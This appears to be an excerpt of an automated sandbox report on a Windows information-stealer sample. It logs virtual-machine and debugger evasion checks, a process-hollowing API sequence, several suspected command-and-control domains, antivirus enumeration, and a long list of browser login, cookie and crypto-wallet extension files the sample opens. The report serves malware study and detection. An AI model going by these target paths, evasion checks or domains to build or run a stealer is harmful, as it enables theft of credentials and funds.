                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\mWAik6b.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\mWAik6b.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeMemory allocated: 8C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeMemory allocated: 21F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exe TID: 3056Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: Amcache.hve.6.drBinary or memory string: VMware
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.000000000138D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8n=
                    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043EF30 LdrInitializeThunk,2_2_0043EF30
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 0_2_024A7F65 mov edi, dword ptr fs:[00000030h]0_2_024A7F65
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 0_2_024A80E2 mov edi, dword ptr fs:[00000030h]0_2_024A80E2
                    Source: C:\Users\user\Desktop\mWAik6b.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 0_2_024A7F65 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_024A7F65
                    Source: C:\Users\user\Desktop\mWAik6b.exeMemory written: C:\Users\user\Desktop\mWAik6b.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: growthselec.bond
                    Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: immolatechallen.bond
                    Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crookedfoshe.bond
                    Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: strivehelpeu.bond
                    Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cultureddirtys.click
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeQueries volume information: C:\Users\user\Desktop\mWAik6b.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, mWAik6b.exe, 00000002.00000002.2277309695.000000000139B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                    Source: C:\Users\user\Desktop\mWAik6b.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: mWAik6b.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.mWAik6b.exe.30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mWAik6b.exe.34a9550.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mWAik6b.exe.34a9550.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                    Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihk8
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                    Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
